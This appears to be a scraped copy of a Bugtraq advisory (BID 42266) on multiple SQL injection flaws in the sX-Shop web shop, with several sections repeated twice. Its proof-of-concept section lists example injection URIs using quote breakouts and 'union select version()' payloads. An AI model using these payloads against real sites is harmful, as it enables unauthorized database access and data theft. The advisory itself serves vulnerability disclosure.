Source WorX sX-Shop Multiple SQL Injection Vulnerabilities
BID:42266
Info
Source WorX sX-Shop Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 42266 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 05 2010 12:00AM |
| Updated: | Aug 05 2010 12:00AM |
| Credit: | CoBRa_21 and secret |
| Vulnerable: |
Source WorX sX-Shop 0 |
| Not Vulnerable: | |
Discussion
Source WorX sX-Shop Multiple SQL Injection Vulnerabilities
sX-Shop is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
sX-Shop is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Source WorX sX-Shop Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/index.php?product=_513' (Sql)
http://www.example.com/[path]/question.php?id=-513 union select version() (Sql)
http://www.example.com/[path]/tell_a_friend.php?id=-500 union select version() (Sql)
http://www.example.com/shop/view_image.php?id=416+and+1=0+Union+Select(UNEXVISIBLECOLUMN)+2+3
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/index.php?product=_513' (Sql)
http://www.example.com/[path]/question.php?id=-513 union select version() (Sql)
http://www.example.com/[path]/tell_a_friend.php?id=-500 union select version() (Sql)
http://www.example.com/shop/view_image.php?id=416+and+1=0+Union+Select(UNEXVISIBLECOLUMN)+2+3
Solution / Fix
Source WorX sX-Shop Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Source WorX sX-Shop Multiple SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (Source WorX)